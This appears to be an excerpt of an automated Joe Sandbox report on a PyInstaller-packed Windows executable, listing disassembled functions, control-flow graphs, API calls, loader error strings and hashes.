7ff7f3dd3fb9-7ff7f3dd3fce 310->323 311->225 318->292 324 7ff7f3dd3fd0-7ff7f3dd3fe3 call 7ff7f3dd2710 call 7ff7f3dd1900 323->324 325 7ff7f3dd3fe8 call 7ff7f3dd2a50 323->325 324->225 325->311
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorFileLastModuleName
                                                                                      • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag$pyi-runtime-tmpdir
                                                                                      • API String ID: 2776309574-4232158417
                                                                                      • Opcode ID: 76a9bc6180b8f33f3d940ce63715ec287eef657ce8d77edeb0dbadd26b6237bc
                                                                                      • Instruction ID: 4fb2ea448d07d9a1701d28de9040923eedc43dd41333b3bd64cbd30ff9cca828
                                                                                      • Opcode Fuzzy Hash: 76a9bc6180b8f33f3d940ce63715ec287eef657ce8d77edeb0dbadd26b6237bc
                                                                                      • Instruction Fuzzy Hash: 7C32AE21A0C68291FB99B7B4D4543B9F761AF44780FC44132DA7E6B2D6DF2CE568C3A0
                                                                                      Function 00007FF7F3DF6964 Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 538 7ff7f3df6964-7ff7f3df69d7 call 7ff7f3df6698 541 7ff7f3df69f1-7ff7f3df69fb call 7ff7f3de8520 538->541 542 7ff7f3df69d9-7ff7f3df69e2 call 7ff7f3de4ee8 538->542 547 7ff7f3df6a16-7ff7f3df6a7f CreateFileW 541->547 548 7ff7f3df69fd-7ff7f3df6a14 call 7ff7f3de4ee8 call 7ff7f3de4f08 541->548 549 7ff7f3df69e5-7ff7f3df69ec call 7ff7f3de4f08 542->549 551 7ff7f3df6a81-7ff7f3df6a87 547->551 552 7ff7f3df6afc-7ff7f3df6b07 GetFileType 547->552 548->549 565 7ff7f3df6d32-7ff7f3df6d52 549->565 555 7ff7f3df6ac9-7ff7f3df6af7 GetLastError call 7ff7f3de4e7c 551->555 556 7ff7f3df6a89-7ff7f3df6a8d 551->556 558 7ff7f3df6b09-7ff7f3df6b44 GetLastError call 7ff7f3de4e7c CloseHandle 552->558 559 7ff7f3df6b5a-7ff7f3df6b61 552->559 555->549 556->555 563 7ff7f3df6a8f-7ff7f3df6ac7 CreateFileW 556->563 558->549 572 7ff7f3df6b4a-7ff7f3df6b55 call 7ff7f3de4f08 558->572 561 7ff7f3df6b63-7ff7f3df6b67 559->561 562 7ff7f3df6b69-7ff7f3df6b6c 559->562 568 7ff7f3df6b72-7ff7f3df6bc7 call 7ff7f3de8438 561->568 562->568 569 7ff7f3df6b6e 562->569 563->552 563->555 577 7ff7f3df6be6-7ff7f3df6c17 call 7ff7f3df6418 568->577 578 7ff7f3df6bc9-7ff7f3df6bd5 call 7ff7f3df68a0 568->578 569->568 572->549 583 7ff7f3df6c1d-7ff7f3df6c5f 577->583 584 7ff7f3df6c19-7ff7f3df6c1b 577->584 578->577 585 7ff7f3df6bd7 578->585 587 7ff7f3df6c81-7ff7f3df6c8c 583->587 588 7ff7f3df6c61-7ff7f3df6c65 583->588 586 7ff7f3df6bd9-7ff7f3df6be1 call 7ff7f3deaac0 584->586 585->586 586->565 590 7ff7f3df6c92-7ff7f3df6c96 587->590 591 7ff7f3df6d30 587->591 588->587 589 7ff7f3df6c67-7ff7f3df6c7c 588->589 589->587 590->591 594 7ff7f3df6c9c-7ff7f3df6ce1 CloseHandle CreateFileW 590->594 591->565 595 7ff7f3df6d16-7ff7f3df6d2b 594->595 596 7ff7f3df6ce3-7ff7f3df6d11 GetLastError call 7ff7f3de4e7c call 7ff7f3de8660 594->596 595->591 596->595
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                      • String ID:
                                                                                      • API String ID: 1617910340-0
                                                                                      • Opcode ID: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                      • Instruction ID: 6869748603e4a58de962c456635117745c60ba011b704a3eb74383bd1e551039
                                                                                      • Opcode Fuzzy Hash: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                      • Instruction Fuzzy Hash: 46C1B132B28A4285EB50EFB5C4912AC7765FB49B98B814235DE3E6B7D8CF38D055C390
                                                                                      Function 00007FF7F3DD9280 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$CloseFileFirst
                                                                                      • String ID:
                                                                                      • API String ID: 2295610775-0
                                                                                      • Opcode ID: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                      • Instruction ID: a7ca895c0948d9ab81e47e3977dfa6b0a6a0bd7d763ff6a410496da1bd87aec7
                                                                                      • Opcode Fuzzy Hash: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                      • Instruction Fuzzy Hash: 22F0C862A1974186F7E0AFE0B489766B350EB84368F840335DA7E1A6D4DF3CD149CB40
                                                                                      Function 00007FF7F3DF08C8 Relevance: 2.0, APIs: 1, Instructions: 461COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentFeaturePresentProcessProcessor
                                                                                      • String ID:
                                                                                      • API String ID: 1010374628-0
                                                                                      • Opcode ID: 537422541fbed36a77ddee3a41e978a3695e14332b64c7d8d0a2d6c09592a1ae
                                                                                      • Instruction ID: 97ea09916fda8839f94e22c4833aea3a42d5199110d7210012a895fc9922149f
                                                                                      • Opcode Fuzzy Hash: 537422541fbed36a77ddee3a41e978a3695e14332b64c7d8d0a2d6c09592a1ae
                                                                                      • Instruction Fuzzy Hash: 8102D221A1D64340FBD9BBA59880279EA90AF41BA0FC54634DD7E6F3D9DE3DE44183A0
                                                                                      Function 00007FF7F3DD1950 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 184COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 331 7ff7f3dd1950-7ff7f3dd198b call 7ff7f3dd45c0 334 7ff7f3dd1991-7ff7f3dd19d1 call 7ff7f3dd7f90 331->334 335 7ff7f3dd1c4e-7ff7f3dd1c72 call 7ff7f3ddc550 331->335 340 7ff7f3dd1c3b-7ff7f3dd1c3e call 7ff7f3de004c 334->340 341 7ff7f3dd19d7-7ff7f3dd19e7 call 7ff7f3de06d4 334->341 345 7ff7f3dd1c43-7ff7f3dd1c4b 340->345 346 7ff7f3dd1a08-7ff7f3dd1a24 call 7ff7f3de039c 341->346 347 7ff7f3dd19e9-7ff7f3dd1a03 call 7ff7f3de4f08 call 7ff7f3dd2910 341->347 345->335 353 7ff7f3dd1a45-7ff7f3dd1a5a call 7ff7f3de4f28 346->353 354 7ff7f3dd1a26-7ff7f3dd1a40 call 7ff7f3de4f08 call 7ff7f3dd2910 346->354 347->340 360 7ff7f3dd1a7b-7ff7f3dd1afc call 7ff7f3dd1c80 * 2 call 7ff7f3de06d4 353->360 361 7ff7f3dd1a5c-7ff7f3dd1a76 call 7ff7f3de4f08 call 7ff7f3dd2910 353->361 354->340 373 7ff7f3dd1b01-7ff7f3dd1b14 call 7ff7f3de4f44 360->373 361->340 376 7ff7f3dd1b35-7ff7f3dd1b4e call 7ff7f3de039c 373->376 377 7ff7f3dd1b16-7ff7f3dd1b30 call 7ff7f3de4f08 call 7ff7f3dd2910 373->377 383 7ff7f3dd1b6f-7ff7f3dd1b8b call 7ff7f3de0110 376->383 384 7ff7f3dd1b50-7ff7f3dd1b6a call 7ff7f3de4f08 call 7ff7f3dd2910 376->384 377->340 391 7ff7f3dd1b8d-7ff7f3dd1b99 call 7ff7f3dd2710 383->391 392 7ff7f3dd1b9e-7ff7f3dd1bac 383->392 384->340 391->340 392->340 394 7ff7f3dd1bb2-7ff7f3dd1bb9 392->394 397 7ff7f3dd1bc1-7ff7f3dd1bc7 394->397 398 7ff7f3dd1be0-7ff7f3dd1bef 397->398 399 7ff7f3dd1bc9-7ff7f3dd1bd6 397->399 398->398 400 7ff7f3dd1bf1-7ff7f3dd1bfa 398->400 399->400 401 7ff7f3dd1c0f 400->401 402 7ff7f3dd1bfc-7ff7f3dd1bff 400->402 404 7ff7f3dd1c11-7ff7f3dd1c24 401->404 402->401 403 7ff7f3dd1c01-7ff7f3dd1c04 402->403 403->401 405 7ff7f3dd1c06-7ff7f3dd1c09 403->405 406 7ff7f3dd1c26 404->406 407 7ff7f3dd1c2d-7ff7f3dd1c39 404->407 405->401 408 7ff7f3dd1c0b-7ff7f3dd1c0d 405->408 406->407 407->340 407->397 408->404
                                                                                      APIs
                                                                                        • Part of subcall function 00007FF7F3DD7F90: _fread_nolock.LIBCMT ref: 00007FF7F3DD803A
                                                                                      • _fread_nolock.LIBCMT ref: 00007FF7F3DD1A1B
                                                                                        • Part of subcall function 00007FF7F3DD2910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF7F3DD1B6A), ref: 00007FF7F3DD295E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _fread_nolock$CurrentProcess
                                                                                      • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                      • API String ID: 2397952137-3497178890
                                                                                      • Opcode ID: e060d84aa5bf36d8a380aea433863807716a2bfcfbbc2a242715e1548c9dcf31
                                                                                      • Instruction ID: c0abb39bb4e068bbccd6192fcc26d7cc6bf6f57499df95413ff2afa3bbc1c1a6
                                                                                      • Opcode Fuzzy Hash: e060d84aa5bf36d8a380aea433863807716a2bfcfbbc2a242715e1548c9dcf31
                                                                                      • Instruction Fuzzy Hash: C9819271A0D68385EBE0EBA4D0412B9B3A4FF48744F844531E9AD6B7C9DE3CE58587A0
                                                                                      Function 00007FF7F3DD1600 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 145COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 409 7ff7f3dd1600-7ff7f3dd1611 410 7ff7f3dd1613-7ff7f3dd161c call 7ff7f3dd1050 409->410 411 7ff7f3dd1637-7ff7f3dd1651 call 7ff7f3dd45c0 409->411 416 7ff7f3dd162e-7ff7f3dd1636 410->416 417 7ff7f3dd161e-7ff7f3dd1629 call 7ff7f3dd2710 410->417 418 7ff7f3dd1653-7ff7f3dd1681 call 7ff7f3de4f08 call 7ff7f3dd2910 411->418 419 7ff7f3dd1682-7ff7f3dd169c call 7ff7f3dd45c0 411->419 417->416 426 7ff7f3dd169e-7ff7f3dd16b3 call 7ff7f3dd2710 419->426 427 7ff7f3dd16b8-7ff7f3dd16cf call 7ff7f3de06d4 419->427 433 7ff7f3dd1821-7ff7f3dd1824 call 7ff7f3de004c 426->433 434 7ff7f3dd16d1-7ff7f3dd16f4 call 7ff7f3de4f08 call 7ff7f3dd2910 427->434 435 7ff7f3dd16f9-7ff7f3dd16fd 427->435 442 7ff7f3dd1829-7ff7f3dd183b 433->442 448 7ff7f3dd1819-7ff7f3dd181c call 7ff7f3de004c 434->448 436 7ff7f3dd16ff-7ff7f3dd170b call 7ff7f3dd1210 435->436 437 7ff7f3dd1717-7ff7f3dd1737 call 7ff7f3de4f44 435->437 445 7ff7f3dd1710-7ff7f3dd1712 436->445 449 7ff7f3dd1761-7ff7f3dd176c 437->449 450 7ff7f3dd1739-7ff7f3dd175c call 7ff7f3de4f08 call 7ff7f3dd2910 437->450 445->448 448->433 453 7ff7f3dd1802-7ff7f3dd180a call 7ff7f3de4f30 449->453 454 7ff7f3dd1772-7ff7f3dd1777 449->454 462 7ff7f3dd180f-7ff7f3dd1814 450->462 453->462 455 7ff7f3dd1780-7ff7f3dd17a2 call 7ff7f3de039c 454->455 464 7ff7f3dd17a4-7ff7f3dd17bc call 7ff7f3de0adc 455->464 465 7ff7f3dd17da-7ff7f3dd17e6 call 7ff7f3de4f08 455->465 462->448 470 7ff7f3dd17c5-7ff7f3dd17d8 call 7ff7f3de4f08 464->470 471 7ff7f3dd17be-7ff7f3dd17c1 464->471 472 7ff7f3dd17ed-7ff7f3dd17f8 call 7ff7f3dd2910 465->472 470->472 471->455 473 7ff7f3dd17c3 471->473 477 7ff7f3dd17fd 472->477 473->477 477->453
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentProcess
                                                                                      • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                      • API String ID: 2050909247-1550345328
                                                                                      • Opcode ID: f6eb3f98450cbc5f74df1446d4150ca3e377cb8f23e7e3bf82aec3682dfd8963
                                                                                      • Instruction ID: 49c70b0aacbad83e1b3dc2436593b74adcfd4fa2dc1f5cb23b310c3ec4c07e38
                                                                                      • Opcode Fuzzy Hash: f6eb3f98450cbc5f74df1446d4150ca3e377cb8f23e7e3bf82aec3682dfd8963
                                                                                      • Instruction Fuzzy Hash: 99519E61B0964392EB94BBA194401B9B3A4FF84B94FC44631ED3C2F7D6DE3CE58587A0
                                                                                      Function 00007FF7F3DD8660 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 116COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • GetTempPathW.KERNEL32(?,?,00000000,00007FF7F3DD3CBB), ref: 00007FF7F3DD8704
                                                                                      • GetCurrentProcessId.KERNEL32(?,00000000,00007FF7F3DD3CBB), ref: 00007FF7F3DD870A
                                                                                      • CreateDirectoryW.KERNELBASE(?,00000000,00007FF7F3DD3CBB), ref: 00007FF7F3DD874C
                                                                                        • Part of subcall function 00007FF7F3DD8830: GetEnvironmentVariableW.KERNEL32(00007FF7F3DD388E), ref: 00007FF7F3DD8867
                                                                                        • Part of subcall function 00007FF7F3DD8830: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF7F3DD8889
                                                                                        • Part of subcall function 00007FF7F3DE8238: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F3DE8251
                                                                                        • Part of subcall function 00007FF7F3DD2810: MessageBoxW.USER32 ref: 00007FF7F3DD28EA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                      • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                      • API String ID: 3563477958-1339014028
                                                                                      • Opcode ID: e09d7b167afd2147c660aa35db8091a51c6906773476d98e2344c67e24741bda
                                                                                      • Instruction ID: 5460fdd844c23a0caff50222cc78e142a0a5b6fb2ca46bdd174d2b9a71add00c
                                                                                      • Opcode Fuzzy Hash: e09d7b167afd2147c660aa35db8091a51c6906773476d98e2344c67e24741bda
                                                                                      • Instruction Fuzzy Hash: 9B419F11A1964254FB96B7E1A8652B9A290AF84BC0FC04131ED3D6F7DADE3CE545C3E0
                                                                                      Function 00007FF7F3DD1210 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 158COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 601 7ff7f3dd1210-7ff7f3dd126d call 7ff7f3ddbd80 604 7ff7f3dd126f-7ff7f3dd1296 call 7ff7f3dd2710 601->604 605 7ff7f3dd1297-7ff7f3dd12af call 7ff7f3de4f44 601->605 610 7ff7f3dd12d4-7ff7f3dd12e4 call 7ff7f3de4f44 605->610 611 7ff7f3dd12b1-7ff7f3dd12cf call 7ff7f3de4f08 call 7ff7f3dd2910 605->611 616 7ff7f3dd12e6-7ff7f3dd1304 call 7ff7f3de4f08 call 7ff7f3dd2910 610->616 617 7ff7f3dd1309-7ff7f3dd131b 610->617 624 7ff7f3dd1439-7ff7f3dd146d call 7ff7f3ddba60 call 7ff7f3de4f30 * 2 611->624 616->624 620 7ff7f3dd1320-7ff7f3dd1345 call 7ff7f3de039c 617->620 630 7ff7f3dd1431 620->630 631 7ff7f3dd134b-7ff7f3dd1355 call 7ff7f3de0110 620->631 630->624 631->630 637 7ff7f3dd135b-7ff7f3dd1367 631->637 639 7ff7f3dd1370-7ff7f3dd1398 call 7ff7f3dda1c0 637->639 642 7ff7f3dd1416-7ff7f3dd142c call 7ff7f3dd2710 639->642 643 7ff7f3dd139a-7ff7f3dd139d 639->643 642->630 644 7ff7f3dd139f-7ff7f3dd13a9 643->644 645 7ff7f3dd1411 643->645 647 7ff7f3dd13d4-7ff7f3dd13d7 644->647 648 7ff7f3dd13ab-7ff7f3dd13b9 call 7ff7f3de0adc 644->648 645->642 650 7ff7f3dd13d9-7ff7f3dd13e7 call 7ff7f3df9e30 647->650 651 7ff7f3dd13ea-7ff7f3dd13ef 647->651 652 7ff7f3dd13be-7ff7f3dd13c1 648->652 650->651 651->639 654 7ff7f3dd13f5-7ff7f3dd13f8 651->654 655 7ff7f3dd13c3-7ff7f3dd13cd call 7ff7f3de0110 652->655 656 7ff7f3dd13cf-7ff7f3dd13d2 652->656 658 7ff7f3dd140c-7ff7f3dd140f 654->658 659 7ff7f3dd13fa-7ff7f3dd13fd 654->659 655->651 655->656 656->642 658->630 659->642 660 7ff7f3dd13ff-7ff7f3dd1407 659->660 660->620
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentProcess
                                                                                      • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                      • API String ID: 2050909247-2813020118
                                                                                      • Opcode ID: 4176682b56444a78b74e0a45c684f191b40491c6c63e868bb09f8baa48a37ad0
                                                                                      • Instruction ID: d1f98d6a146640630b6d44f97480d82eaf7043d5bf68b8ae6c1c38cafc661599
                                                                                      • Opcode Fuzzy Hash: 4176682b56444a78b74e0a45c684f191b40491c6c63e868bb09f8baa48a37ad0
                                                                                      • Instruction Fuzzy Hash: F3510622A0964341EBE4BBA1A4403BAB691FF44794FC44135ED6D6B7C5DE3CE441C790
                                                                                      Function 00007FF7F3DD36B0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 61COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • GetModuleFileNameW.KERNEL32(?,00007FF7F3DD3804), ref: 00007FF7F3DD36E1
                                                                                      • GetLastError.KERNEL32(?,00007FF7F3DD3804), ref: 00007FF7F3DD36EB
                                                                                        • Part of subcall function 00007FF7F3DD2C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7F3DD3706,?,00007FF7F3DD3804), ref: 00007FF7F3DD2C9E
                                                                                        • Part of subcall function 00007FF7F3DD2C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7F3DD3706,?,00007FF7F3DD3804), ref: 00007FF7F3DD2D63
                                                                                        • Part of subcall function 00007FF7F3DD2C50: MessageBoxW.USER32 ref: 00007FF7F3DD2D99
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                      • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                      • API String ID: 3187769757-2863816727
                                                                                      • Opcode ID: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                      • Instruction ID: 6e3e81b34d53e10b69dc84d0416274b69e031a06a4304550f486cd0837dcf434
                                                                                      • Opcode Fuzzy Hash: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
